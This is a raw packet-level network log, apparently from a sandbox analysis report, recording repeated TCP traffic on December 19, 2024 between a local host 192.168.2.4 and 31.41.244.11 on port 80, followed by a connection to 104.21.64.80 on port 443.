                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.773030043 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.775342941 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.775408030 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.775441885 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.776110888 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.777812004 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.777911901 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.777936935 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.778019905 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.780363083 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.780428886 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.780469894 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.780514956 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.782860041 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.782959938 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.782969952 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.783215046 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.785367966 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.785454988 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.785506010 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.785553932 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.787856102 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.787967920 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.787975073 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.788036108 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.790395021 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.790574074 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.790648937 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.792876005 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.792977095 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.792984009 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.793057919 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.795387030 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.795474052 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.795511961 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.795605898 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.797928095 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.797983885 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.798016071 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.798063040 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.800451994 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.800506115 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.800571918 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.802936077 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.803045988 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.803060055 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.803139925 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.805421114 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.805475950 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.805475950 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.805519104 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.807941914 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.807991982 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.808058977 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.808119059 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.810456038 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.810550928 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.810575962 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.810691118 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.813060045 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.813097954 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.813131094 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.813158989 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.815505981 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.815606117 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.815644026 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.815742970 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.818021059 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.818095922 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.818155050 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.818326950 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.820523024 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.820574045 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.820642948 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.820832014 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.823055983 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.823179007 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.823231936 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.825525045 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.825602055 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.825654030 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.825750113 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.828022957 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.828116894 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.828151941 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.828210115 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.830530882 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.830585957 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.830593109 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.830699921 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.833062887 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.833156109 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.833163023 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.833278894 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.835676908 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.835818052 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.835819006 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.836091995 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.838041067 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.838170052 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.838171005 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.838270903 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.840569973 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.840655088 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.840666056 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.840697050 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.915229082 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.915327072 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.915432930 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.916469097 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.916582108 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.916672945 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.918976068 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.922230959 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.944310904 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.944348097 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.944405079 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.945236921 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.945358038 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.945400953 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.947261095 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.947349072 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.947407961 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.947463989 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.949245930 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.949348927 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.949368954 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.949476957 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.951246023 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.951303959 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.951386929 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.953214884 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.953324080 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.953371048 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.953371048 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.955173969 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.955219030 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.955240965 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.955300093 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.957068920 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.957196951 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.957254887 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.958933115 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.959014893 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.959048986 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.959122896 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.960773945 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.960825920 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.960839987 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.960882902 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.962649107 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.962750912 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.962773085 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.962841034 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.964452982 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.964534998 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.964581966 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.964670897 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.966295958 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.966352940 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.966367960 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.966492891 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.968044043 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.968106031 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.968164921 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.968230009 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.969882965 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.969940901 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.969991922 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.970035076 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.971657038 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.971724987 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.971791029 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.971860886 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.973499060 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.973560095 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.973737955 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.973783016 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.975249052 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.975389957 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.975449085 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.977081060 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.977163076 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.977165937 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.977284908 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.978841066 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.978913069 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.978972912 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.979043961 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.980773926 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.980834007 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.980889082 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.980959892 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.982424974 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.982497931 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.982515097 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.982559919 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.984257936 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.984317064 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.984349012 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.984411001 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.986032009 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.986136913 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.986188889 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.987869978 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.987921953 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.987926006 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.987972975 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.989608049 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.989684105 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.989741087 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.989787102 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.991420984 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.991472960 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.991520882 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.991520882 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.993185043 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.993252039 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.993315935 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.993482113 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.995009899 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.995074987 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.995141029 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.996803045 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.996871948 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.996933937 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.998049021 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.998594999 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.998755932 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.998828888 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.000381947 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.000552893 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.000622034 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.002202988 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.002266884 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.002312899 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.003988981 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.004076004 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.004113913 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.005775928 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.005870104 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.005896091 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.005955935 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.007603884 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.007694960 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.007781029 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.009397984 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.009501934 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.009568930 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.011207104 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.011348009 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.011414051 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.012962103 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.013015985 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.013072014 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.014233112 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.014754057 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.014802933 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.014866114 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.014918089 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.016581059 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.016649961 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.016681910 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.016745090 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.018383026 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.018481016 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.018524885 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.018524885 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.020174026 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.020258904 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.020349979 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.021986961 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.022063971 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.022115946 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.022190094 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.023679972 CET49918443192.168.2.4104.21.64.80
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.023756981 CET44349918104.21.64.80192.168.2.4
